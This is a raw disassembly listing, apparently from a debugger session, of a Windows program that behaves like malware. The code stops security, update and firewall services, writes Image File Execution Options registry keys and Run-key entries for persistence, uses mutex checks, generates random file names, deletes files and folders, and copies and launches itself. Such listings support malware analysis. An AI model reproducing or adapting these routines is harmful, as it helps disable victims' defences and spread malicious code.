0040F513 |. 8B45 CC |mov eax, dword ptr ss:[ebp-34]
0040F516 |. E8 7D49FFFF |call 00403E98
0040F51B |. 50 |push eax ; |FileName
0040F51C |. E8 6B52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F521 |. 6A 06 |push 6
0040F523 |. 8D45 C0 |lea eax, dword ptr ss:[ebp-40]
0040F526 |. E8 A585FFFF |call 00407AD0
0040F52B |. FF75 C0 |push dword ptr ss:[ebp-40]
0040F52E |. A1 3C154100 |mov eax, dword ptr ds:[41153C]
0040F533 |. FF30 |push dword ptr ds:[eax]
0040F535 |. FF37 |push dword ptr ds:[edi]
0040F537 |. 8D45 C4 |lea eax, dword ptr ss:[ebp-3C]
0040F53A |. BA 03000000 |mov edx, 3
0040F53F |. E8 1448FFFF |call 00403D58
0040F544 |. 8B45 C4 |mov eax, dword ptr ss:[ebp-3C]
0040F547 |. E8 4C49FFFF |call 00403E98
0040F54C |. 50 |push eax ; |FileName
0040F54D |. E8 3A52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F552 |. 6A 06 |push 6
0040F554 |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F557 |. E8 2884FFFF |call 00407984
0040F55C |. 8D45 BC |lea eax, dword ptr ss:[ebp-44]
0040F55F |. BA 74034100 |mov edx, 00410374 ; ASCII "Common Files\System"
0040F564 |. E8 3747FFFF |call 00403CA0
0040F569 |. 8B45 BC |mov eax, dword ptr ss:[ebp-44]
0040F56C |. E8 2749FFFF |call 00403E98
0040F571 |. 50 |push eax ; |FileName
0040F572 |. E8 1552FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F577 |. 6A 06 |push 6
0040F579 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F57C |. E8 0384FFFF |call 00407984
0040F581 |. 8D45 B8 |lea eax, dword ptr ss:[ebp-48]
0040F584 |. BA 90034100 |mov edx, 00410390 ; ASCII "Common Files\Microsoft Shared"
0040F589 |. E8 1247FFFF |call 00403CA0
0040F58E |. 8B45 B8 |mov eax, dword ptr ss:[ebp-48]
0040F591 |. E8 0249FFFF |call 00403E98
0040F596 |. 50 |push eax ; |FileName
0040F597 |. E8 F051FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F59C |> 83C3 04 |add ebx, 4
0040F59F |. 4E |dec esi
0040F5A0 |.^ 0F85 FBFDFFFF \jnz 0040F3A1
0040F5A6 |. B8 B8034100 mov eax, 004103B8 ; ASCII "wscsvc"
0040F5AB |. E8 2087FFFF call 00407CD0
0040F5B0 |. B8 C8034100 mov eax, 004103C8 ; ASCII "helpsvc"
0040F5B5 |. E8 1687FFFF call 00407CD0
0040F5BA |. B8 D8034100 mov eax, 004103D8 ; ASCII "wuauserv"
0040F5BF |. E8 0C87FFFF call 00407CD0
0040F5C4 |. B8 EC034100 mov eax, 004103EC ; ASCII "SharedAccess"
0040F5C9 |. E8 0287FFFF call 00407CD0
0040F5CE |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5D3 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F5D8 |. FF30 push dword ptr ds:[eax]
0040F5DA |. FF37 push dword ptr ds:[edi]
0040F5DC |. 8D45 B4 lea eax, dword ptr ss:[ebp-4C]
0040F5DF |. BA 03000000 mov edx, 3
0040F5E4 |. E8 6F47FFFF call 00403D58
0040F5E9 |. 8B55 B4 mov edx, dword ptr ss:[ebp-4C]
0040F5EC |. B8 02000080 mov eax, 80000002
0040F5F1 |. E8 3E76FFFF call 00406C34
0040F5F6 |. 68 04044100 push 00410404 ; ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
0040F5FB |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F600 |. FF30 push dword ptr ds:[eax]
0040F602 |. FF37 push dword ptr ds:[edi]
0040F604 |. 8D45 B0 lea eax, dword ptr ss:[ebp-50]
0040F607 |. BA 03000000 mov edx, 3
0040F60C |. E8 4747FFFF call 00403D58
0040F611 |. 8B55 B0 mov edx, dword ptr ss:[ebp-50]
0040F614 |. B8 02000080 mov eax, 80000002
0040F619 |. E8 1676FFFF call 00406C34
0040F61E |. 8D55 AC lea edx, dword ptr ss:[ebp-54]
0040F621 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F626 |. 8B00 mov eax, dword ptr ds:[eax]
0040F628 |. E8 D36DFFFF call 00406400
0040F62D |. 8B45 AC mov eax, dword ptr ss:[ebp-54]
0040F630 |. 50 push eax
0040F631 |. 8D45 A0 lea eax, dword ptr ss:[ebp-60]
0040F634 |. E8 E783FFFF call 00407A20
0040F639 |. FF75 A0 push dword ptr ss:[ebp-60]
0040F63C |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F641 |. FF30 push dword ptr ds:[eax]
0040F643 |. FF37 push dword ptr ds:[edi]
0040F645 |. 8D45 A4 lea eax, dword ptr ss:[ebp-5C]
0040F648 |. BA 03000000 mov edx, 3
0040F64D |. E8 0647FFFF call 00403D58
0040F652 |. 8B45 A4 mov eax, dword ptr ss:[ebp-5C]
0040F655 |. 8D55 A8 lea edx, dword ptr ss:[ebp-58]
0040F658 |. E8 A36DFFFF call 00406400
0040F65D |. 8B55 A8 mov edx, dword ptr ss:[ebp-58]
0040F660 |. 58 pop eax
0040F661 |. E8 7E47FFFF call 00403DE4
0040F666 |. 0F84 C4060000 je 0040FD30
0040F66C |. 8D55 9C lea edx, dword ptr ss:[ebp-64]
0040F66F |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F674 |. 8B00 mov eax, dword ptr ds:[eax]
0040F676 |. E8 856DFFFF call 00406400
0040F67B |. 8B45 9C mov eax, dword ptr ss:[ebp-64]
0040F67E |. 50 push eax
0040F67F |. 8D45 90 lea eax, dword ptr ss:[ebp-70]
0040F682 |. E8 4984FFFF call 00407AD0
0040F687 |. FF75 90 push dword ptr ss:[ebp-70]
0040F68A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F68F |. FF30 push dword ptr ds:[eax]
0040F691 |. FF37 push dword ptr ds:[edi]
0040F693 |. 8D45 94 lea eax, dword ptr ss:[ebp-6C]
0040F696 |. BA 03000000 mov edx, 3
0040F69B |. E8 B846FFFF call 00403D58
0040F6A0 |. 8B45 94 mov eax, dword ptr ss:[ebp-6C]
0040F6A3 |. 8D55 98 lea edx, dword ptr ss:[ebp-68]
0040F6A6 |. E8 556DFFFF call 00406400
0040F6AB |. 8B55 98 mov edx, dword ptr ss:[ebp-68]
0040F6AE |. 58 pop eax
0040F6AF |. E8 3047FFFF call 00403DE4
0040F6B4 |. 0F84 76060000 je 0040FD30
0040F6BA |. 8D55 8C lea edx, dword ptr ss:[ebp-74]
0040F6BD |. A1 60144100 mov eax, dword ptr ds:[411460]
0040F6C2 |. 8B00 mov eax, dword ptr ds:[eax]
0040F6C4 |. E8 D36FFFFF call 0040669C
0040F6C9 |. 8D45 8C lea eax, dword ptr ss:[ebp-74]
0040F6CC |. 50 push eax
0040F6CD |. 8D45 84 lea eax, dword ptr ss:[ebp-7C]
0040F6D0 |. E8 F369FFFF call 004060C8
0040F6D5 |. 8B45 84 mov eax, dword ptr ss:[ebp-7C]
0040F6D8 |. 8D55 88 lea edx, dword ptr ss:[ebp-78]
0040F6DB |. E8 AC84FFFF call 00407B8C
0040F6E0 |. 8B55 88 mov edx, dword ptr ss:[ebp-78]
0040F6E3 |. 58 pop eax
0040F6E4 |. E8 B745FFFF call 00403CA0
0040F6E9 |. 8B45 8C mov eax, dword ptr ss:[ebp-74]
0040F6EC |. E8 A747FFFF call 00403E98
0040F6F1 |. 50 push eax ; /MutexName
0040F6F2 |. 6A 00 push 0 ; |Inheritable = FALSE
0040F6F4 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F6F9 |. E8 6650FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F6FE |. 85C0 test eax, eax
0040F700 |. 0F85 EA0B0000 jnz 004102F0
0040F706 |. 8D85 7CFFFFFF lea eax, dword ptr ss:[ebp-84]
0040F70C |. E8 B769FFFF call 004060C8
0040F711 |. 8B85 7CFFFFFF mov eax, dword ptr ss:[ebp-84]
0040F717 |. 8D55 80 lea edx, dword ptr ss:[ebp-80]
0040F71A |. E8 6D84FFFF call 00407B8C
0040F71F |. 8D45 80 lea eax, dword ptr ss:[ebp-80]
0040F722 |. 50 push eax
0040F723 |. 8D95 78FFFFFF lea edx, dword ptr ss:[ebp-88]
0040F729 |. A1 64144100 mov eax, dword ptr ds:[411464]
0040F72E |. 8B00 mov eax, dword ptr ds:[eax]
0040F730 |. E8 676FFFFF call 0040669C
0040F735 |. 8B95 78FFFFFF mov edx, dword ptr ss:[ebp-88]
0040F73B |. 58 pop eax
0040F73C |. E8 5F45FFFF call 00403CA0
0040F741 |. 8B45 80 mov eax, dword ptr ss:[ebp-80]
0040F744 |. E8 4F47FFFF call 00403E98
0040F749 |. 50 push eax ; /MutexName
0040F74A |. 6A 00 push 0 ; |Inheritable = FALSE
0040F74C |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F751 |. E8 0E50FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F756 |. 85C0 test eax, eax
0040F758 |. 0F85 920B0000 jnz 004102F0
0040F75E |. E8 0530FFFF call 00402768
0040F763 |. B8 19000000 mov eax, 19
0040F768 |. E8 9F35FFFF call 00402D0C
0040F76D |. 8BD0 mov edx, eax
0040F76F |. 83C2 61 add edx, 61
0040F772 |. 8D85 74FFFFFF lea eax, dword ptr ss:[ebp-8C]
0040F778 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F77B |. C600 01 mov byte ptr ds:[eax], 1
0040F77E |. 8D95 74FFFFFF lea edx, dword ptr ss:[ebp-8C]
0040F784 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F78A |. E8 CD34FFFF call 00402C5C
0040F78F |. B8 19000000 mov eax, 19
0040F794 |. E8 7335FFFF call 00402D0C
0040F799 |. 8BD0 mov edx, eax
0040F79B |. 83C2 61 add edx, 61
0040F79E |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7A4 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7A7 |. C600 01 mov byte ptr ds:[eax], 1
0040F7AA |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7B0 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F7B6 |. B1 02 mov cl, 2
0040F7B8 |. E8 6F34FFFF call 00402C2C
0040F7BD |. 8D95 70FFFFFF lea edx, dword ptr ss:[ebp-90]
0040F7C3 |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7C9 |. E8 8E34FFFF call 00402C5C
0040F7CE |. B8 19000000 mov eax, 19
0040F7D3 |. E8 3435FFFF call 00402D0C
0040F7D8 |. 8BD0 mov edx, eax
0040F7DA |. 83C2 61 add edx, 61
0040F7DD |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7E3 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7E6 |. C600 01 mov byte ptr ds:[eax], 1
0040F7E9 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7EF |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7F5 |. B1 03 mov cl, 3
0040F7F7 |. E8 3034FFFF call 00402C2C
0040F7FC |. 8D95 68FFFFFF lea edx, dword ptr ss:[ebp-98]
0040F802 |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F808 |. E8 4F34FFFF call 00402C5C
0040F80D |. B8 19000000 mov eax, 19
0040F812 |. E8 F534FFFF call 00402D0C
0040F817 |. 8BD0 mov edx, eax
0040F819 |. 83C2 61 add edx, 61
0040F81C |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F822 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F825 |. C600 01 mov byte ptr ds:[eax], 1
0040F828 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F82E |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F834 |. B1 04 mov cl, 4
0040F836 |. E8 F133FFFF call 00402C2C
0040F83B |. 8D95 60FFFFFF lea edx, dword ptr ss:[ebp-A0]
0040F841 |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F847 |. E8 1034FFFF call 00402C5C
0040F84C |. B8 19000000 mov eax, 19
0040F851 |. E8 B634FFFF call 00402D0C
0040F856 |. 8BD0 mov edx, eax
0040F858 |. 83C2 61 add edx, 61
0040F85B |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F861 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F864 |. C600 01 mov byte ptr ds:[eax], 1
0040F867 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F86D |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F873 |. B1 05 mov cl, 5
0040F875 |. E8 B233FFFF call 00402C2C
0040F87A |. 8D95 58FFFFFF lea edx, dword ptr ss:[ebp-A8]
0040F880 |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F886 |. E8 D133FFFF call 00402C5C
0040F88B |. B8 19000000 mov eax, 19
0040F890 |. E8 7734FFFF call 00402D0C
0040F895 |. 8BD0 mov edx, eax
0040F897 |. 83C2 61 add edx, 61
0040F89A |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F8A0 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F8A3 |. C600 01 mov byte ptr ds:[eax], 1
0040F8A6 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F8AC |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F8B2 |. B1 06 mov cl, 6
0040F8B4 |. E8 7333FFFF call 00402C2C
0040F8B9 |. 8D95 50FFFFFF lea edx, dword ptr ss:[ebp-B0]
0040F8BF |. B8 0C314100 mov eax, 0041310C
0040F8C4 |. E8 AB43FFFF call 00403C74
0040F8C9 |. 68 80000000 push 80
0040F8CE |. 8D85 48FFFFFF lea eax, dword ptr ss:[ebp-B8]
0040F8D4 |. E8 4781FFFF call 00407A20
0040F8D9 |. FFB5 48FFFFFF push dword ptr ss:[ebp-B8]
0040F8DF |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F8E4 |. FF30 push dword ptr ds:[eax]
0040F8E6 |. FF37 push dword ptr ds:[edi]
0040F8E8 |. 8D85 4CFFFFFF lea eax, dword ptr ss:[ebp-B4]
0040F8EE |. BA 03000000 mov edx, 3
0040F8F3 |. E8 6044FFFF call 00403D58
0040F8F8 |. 8B85 4CFFFFFF mov eax, dword ptr ss:[ebp-B4]
0040F8FE |. E8 9545FFFF call 00403E98
0040F903 |. 50 push eax ; |FileName
0040F904 |. E8 834EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F909 |. 68 80000000 push 80
0040F90E |. 8D85 40FFFFFF lea eax, dword ptr ss:[ebp-C0]
0040F914 |. E8 B781FFFF call 00407AD0
0040F919 |. FFB5 40FFFFFF push dword ptr ss:[ebp-C0]
0040F91F |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F924 |. FF30 push dword ptr ds:[eax]
0040F926 |. FF37 push dword ptr ds:[edi]
0040F928 |. 8D85 44FFFFFF lea eax, dword ptr ss:[ebp-BC]
0040F92E |. BA 03000000 mov edx, 3
0040F933 |. E8 2044FFFF call 00403D58
0040F938 |. 8B85 44FFFFFF mov eax, dword ptr ss:[ebp-BC]
0040F93E |. E8 5545FFFF call 00403E98
0040F943 |. 50 push eax ; |FileName
0040F944 |. E8 434EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F949 |. 8D85 38FFFFFF lea eax, dword ptr ss:[ebp-C8]
0040F94F |. E8 CC80FFFF call 00407A20
0040F954 |. FFB5 38FFFFFF push dword ptr ss:[ebp-C8]
0040F95A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F95F |. FF30 push dword ptr ds:[eax]
0040F961 |. FF37 push dword ptr ds:[edi]
0040F963 |. 8D85 3CFFFFFF lea eax, dword ptr ss:[ebp-C4]
0040F969 |. BA 03000000 mov edx, 3
0040F96E |. E8 E543FFFF call 00403D58
0040F973 |. 8B85 3CFFFFFF mov eax, dword ptr ss:[ebp-C4]
0040F979 |. E8 1A45FFFF call 00403E98
0040F97E |. 50 push eax ; /FileName
0040F97F |. E8 404DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F984 |. 8D85 30FFFFFF lea eax, dword ptr ss:[ebp-D0]
0040F98A |. E8 4181FFFF call 00407AD0
0040F98F |. FFB5 30FFFFFF push dword ptr ss:[ebp-D0]
0040F995 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F99A |. FF30 push dword ptr ds:[eax]
0040F99C |. FF37 push dword ptr ds:[edi]
0040F99E |. 8D85 34FFFFFF lea eax, dword ptr ss:[ebp-CC]
0040F9A4 |. BA 03000000 mov edx, 3
0040F9A9 |. E8 AA43FFFF call 00403D58
0040F9AE |. 8B85 34FFFFFF mov eax, dword ptr ss:[ebp-CC]
0040F9B4 |. E8 DF44FFFF call 00403E98
0040F9B9 |. 50 push eax ; /FileName
0040F9BA |. E8 054DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F9BF |. 8D85 28FFFFFF lea eax, dword ptr ss:[ebp-D8]
0040F9C5 |. E8 5680FFFF call 00407A20
0040F9CA |. FFB5 28FFFFFF push dword ptr ss:[ebp-D8]
0040F9D0 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F9D5 |. FF30 push dword ptr ds:[eax]
0040F9D7 |. FF37 push dword ptr ds:[edi]
0040F9D9 |. 8D85 2CFFFFFF lea eax, dword ptr ss:[ebp-D4]
0040F9DF |. BA 03000000 mov edx, 3
0040F9E4 |. E8 6F43FFFF call 00403D58
0040F9E9 |. 8B85 2CFFFFFF mov eax, dword ptr ss:[ebp-D4]
0040F9EF |. E8 A444FFFF call 00403E98
0040F9F4 |. 50 push eax ; /Path
0040F9F5 |. E8 824DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040F9FA |. 8D85 20FFFFFF lea eax, dword ptr ss:[ebp-E0]
0040FA00 |. E8 CB80FFFF call 00407AD0
0040FA05 |. FFB5 20FFFFFF push dword ptr ss:[ebp-E0]
0040FA0B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FA10 |. FF30 push dword ptr ds:[eax]
0040FA12 |. FF37 push dword ptr ds:[edi]
0040FA14 |. 8D85 24FFFFFF lea eax, dword ptr ss:[ebp-DC]
0040FA1A |. BA 03000000 mov edx, 3
0040FA1F |. E8 3443FFFF call 00403D58
0040FA24 |. 8B85 24FFFFFF mov eax, dword ptr ss:[ebp-DC]
0040FA2A |. E8 6944FFFF call 00403E98
0040FA2F |. 50 push eax ; /Path
0040FA30 |. E8 474DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040FA35 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA3B |. E8 E07FFFFF call 00407A20
0040FA40 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA46 |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FA4C |. E8 4F42FFFF call 00403CA0
0040FA51 |. 8B85 18FFFFFF mov eax, dword ptr ss:[ebp-E8]
0040FA57 |. E8 3C44FFFF call 00403E98
0040FA5C |. 8BD0 mov edx, eax
0040FA5E |. 8D85 1CFFFFFF lea eax, dword ptr ss:[ebp-E4]
0040FA64 |. E8 DB41FFFF call 00403C44
0040FA69 |. 8B85 1CFFFFFF mov eax, dword ptr ss:[ebp-E4]
0040FA6F |. 50 push eax
0040FA70 |. 8D85 0CFFFFFF lea eax, dword ptr ss:[ebp-F4]
0040FA76 |. E8 A57FFFFF call 00407A20
0040FA7B |. FFB5 0CFFFFFF push dword ptr ss:[ebp-F4]
0040FA81 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FA86 |. FF30 push dword ptr ds:[eax]
0040FA88 |. FF37 push dword ptr ds:[edi]
0040FA8A |. 8D85 10FFFFFF lea eax, dword ptr ss:[ebp-F0]
0040FA90 |. BA 03000000 mov edx, 3
0040FA95 |. E8 BE42FFFF call 00403D58
0040FA9A |. 8B85 10FFFFFF mov eax, dword ptr ss:[ebp-F0]
0040FAA0 |. E8 F343FFFF call 00403E98
0040FAA5 |. 8BD0 mov edx, eax
0040FAA7 |. 8D85 14FFFFFF lea eax, dword ptr ss:[ebp-EC]
0040FAAD |. E8 9241FFFF call 00403C44
0040FAB2 |. 8B85 14FFFFFF mov eax, dword ptr ss:[ebp-EC]
0040FAB8 |. 5A pop edx
0040FAB9 |. E8 A666FFFF call 00406164
0040FABE |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FAC4 |. E8 0780FFFF call 00407AD0
0040FAC9 |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FACF |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FAD5 |. E8 C641FFFF call 00403CA0
0040FADA |. 8B85 04FFFFFF mov eax, dword ptr ss:[ebp-FC]
0040FAE0 |. E8 B343FFFF call 00403E98
0040FAE5 |. 8BD0 mov edx, eax
0040FAE7 |. 8D85 08FFFFFF lea eax, dword ptr ss:[ebp-F8]
0040FAED |. E8 5241FFFF call 00403C44
0040FAF2 |. 8B85 08FFFFFF mov eax, dword ptr ss:[ebp-F8]
0040FAF8 |. 50 push eax
0040FAF9 |. 8D85 F8FEFFFF lea eax, dword ptr ss:[ebp-108]
0040FAFF |. E8 CC7FFFFF call 00407AD0
0040FB04 |. FFB5 F8FEFFFF push dword ptr ss:[ebp-108]
0040FB0A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FB0F |. FF30 push dword ptr ds:[eax]
0040FB11 |. FF37 push dword ptr ds:[edi]
0040FB13 |. 8D85 FCFEFFFF lea eax, dword ptr ss:[ebp-104]
0040FB19 |. BA 03000000 mov edx, 3
0040FB1E |. E8 3542FFFF call 00403D58
0040FB23 |. 8B85 FCFEFFFF mov eax, dword ptr ss:[ebp-104]
0040FB29 |. E8 6A43FFFF call 00403E98
0040FB2E |. 8BD0 mov edx, eax
0040FB30 |. 8D85 00FFFFFF lea eax, dword ptr ss:[ebp-100]
0040FB36 |. E8 0941FFFF call 00403C44
0040FB3B |. 8B85 00FFFFFF mov eax, dword ptr ss:[ebp-100]
0040FB41 |. 5A pop edx
0040FB42 |. E8 1D66FFFF call 00406164
0040FB47 |. A1 B0144100 mov eax, dword ptr ds:[4114B0]
0040FB4C |. 8B00 mov eax, dword ptr ds:[eax]
0040FB4E |. E8 4543FFFF call 00403E98
0040FB53 |. 8BD0 mov edx, eax
0040FB55 |. 8D85 F4FEFFFF lea eax, dword ptr ss:[ebp-10C]
0040FB5B |. E8 E440FFFF call 00403C44
0040FB60 |. 8B8D F4FEFFFF mov ecx, dword ptr ss:[ebp-10C]
0040FB66 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB6B |. B8 02000080 mov eax, 80000002
0040FB70 |. E8 CF6FFFFF call 00406B44
0040FB75 |. A1 50154100 mov eax, dword ptr ds:[411550]
0040FB7A |. 8B00 mov eax, dword ptr ds:[eax]
0040FB7C |. E8 1743FFFF call 00403E98
0040FB81 |. 8BD0 mov edx, eax
0040FB83 |. 8D85 F0FEFFFF lea eax, dword ptr ss:[ebp-110]
0040FB89 |. E8 B640FFFF call 00403C44
0040FB8E |. 8B8D F0FEFFFF mov ecx, dword ptr ss:[ebp-110]
0040FB94 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB99 |. B8 02000080 mov eax, 80000002
0040FB9E |. E8 A16FFFFF call 00406B44
0040FBA3 |. 6A FF push -1
0040FBA5 |. 8D85 E8FEFFFF lea eax, dword ptr ss:[ebp-118]
0040FBAB |. E8 707EFFFF call 00407A20
0040FBB0 |. FFB5 E8FEFFFF push dword ptr ss:[ebp-118]
0040FBB6 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FBBB |. FF30 push dword ptr ds:[eax]
0040FBBD |. FF37 push dword ptr ds:[edi]
0040FBBF |. 8D85 ECFEFFFF lea eax, dword ptr ss:[ebp-114]
0040FBC5 |. BA 03000000 mov edx, 3
0040FBCA |. E8 8941FFFF call 00403D58
0040FBCF |. 8B85 ECFEFFFF mov eax, dword ptr ss:[ebp-114]
0040FBD5 |. E8 BE42FFFF call 00403E98
0040FBDA |. 50 push eax
0040FBDB |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FBE0 |. 8B00 mov eax, dword ptr ds:[eax]
0040FBE2 |. E8 B142FFFF call 00403E98
0040FBE7 |. 50 push eax ; |ExistingFileName
0040FBE8 |. E8 974AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FBED |. 6A FF push -1
0040FBEF |. 8D85 E0FEFFFF lea eax, dword ptr ss:[ebp-120]
0040FBF5 |. E8 D67EFFFF call 00407AD0
0040FBFA |. FFB5 E0FEFFFF push dword ptr ss:[ebp-120]
0040FC00 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC05 |. FF30 push dword ptr ds:[eax]
0040FC07 |. FF37 push dword ptr ds:[edi]
0040FC09 |. 8D85 E4FEFFFF lea eax, dword ptr ss:[ebp-11C]
0040FC0F |. BA 03000000 mov edx, 3
0040FC14 |. E8 3F41FFFF call 00403D58
0040FC19 |. 8B85 E4FEFFFF mov eax, dword ptr ss:[ebp-11C]
0040FC1F |. E8 7442FFFF call 00403E98
0040FC24 |. 50 push eax
0040FC25 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FC2A |. 8B00 mov eax, dword ptr ds:[eax]
0040FC2C |. E8 6742FFFF call 00403E98
0040FC31 |. 50 push eax ; |ExistingFileName
0040FC32 |. E8 4D4AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FC37 |. 6A 01 push 1
0040FC39 |. 8D85 D8FEFFFF lea eax, dword ptr ss:[ebp-128]
0040FC3F |. E8 DC7DFFFF call 00407A20
0040FC44 |. FFB5 D8FEFFFF push dword ptr ss:[ebp-128]
0040FC4A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FC4F |. FF30 push dword ptr ds:[eax]
0040FC51 |. FF37 push dword ptr ds:[edi]
0040FC53 |. 8D85 DCFEFFFF lea eax, dword ptr ss:[ebp-124]
0040FC59 |. BA 03000000 mov edx, 3
0040FC5E |. E8 F540FFFF call 00403D58
0040FC63 |. 8B85 DCFEFFFF mov eax, dword ptr ss:[ebp-124]
0040FC69 |. E8 2A42FFFF call 00403E98
0040FC6E |. 50 push eax ; |CmdLine
0040FC6F |. E8 304BFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FC74 |. 6A 01 push 1
0040FC76 |. 8D85 D0FEFFFF lea eax, dword ptr ss:[ebp-130]
0040FC7C |. E8 4F7EFFFF call 00407AD0
0040FC81 |. FFB5 D0FEFFFF push dword ptr ss:[ebp-130]
0040FC87 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC8C |. FF30 push dword ptr ds:[eax]
0040FC8E |. FF37 push dword ptr ds:[edi]
0040FC90 |. 8D85 D4FEFFFF lea eax, dword ptr ss:[ebp-12C]
0040FC96 |. BA 03000000 mov edx, 3
0040FC9B |. E8 B840FFFF call 00403D58
0040FCA0 |. 8B85 D4FEFFFF mov eax, dword ptr ss:[ebp-12C]
0040FCA6 |. E8 ED41FFFF call 00403E98
0040FCAB |. 50 push eax ; |CmdLine
0040FCAC |. E8 F34AFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FCB1 |. BE 17000000 mov esi, 17
0040FCB6 |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040FCBC |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040FCC1 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040FCC3 |. E8 A03EFFFF |call 00403B68
0040FCC8 |. 8D95 CCFEFFFF |lea edx, dword ptr ss:[ebp-134]
0040FCCE |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040FCD3 |. 8B00 |mov eax, dword ptr ds:[eax]
0040FCD5 |. E8 2667FFFF |call 00406400
0040FCDA |. 8B85 CCFEFFFF |mov eax, dword ptr ss:[ebp-134]
0040FCE0 |. 50 |push eax
0040FCE1 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040FCE6 |. FF30 |push dword ptr ds:[eax]
0040FCE8 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040FCED |. FF30 |push dword ptr ds:[eax]
0040FCEF |. FF37 |push dword ptr ds:[edi]
0040FCF1 |. 8D85 C4FEFFFF |lea eax, dword ptr ss:[ebp-13C]
0040FCF7 |. BA 03000000 |mov edx, 3
0040FCFC |. E8 5740FFFF |call 00403D58
0040FD01 |. 8B85 C4FEFFFF |mov eax, dword ptr ss:[ebp-13C]
0040FD07 |. 8D95 C8FEFFFF |lea edx, dword ptr ss:[ebp-138]
0040FD0D |. E8 EE66FFFF |call 00406400
0040FD12 |. 8B95 C8FEFFFF |mov edx, dword ptr ss:[ebp-138]
0040FD18 |. 58 |pop eax
0040FD19 |. E8 C640FFFF |call 00403DE4
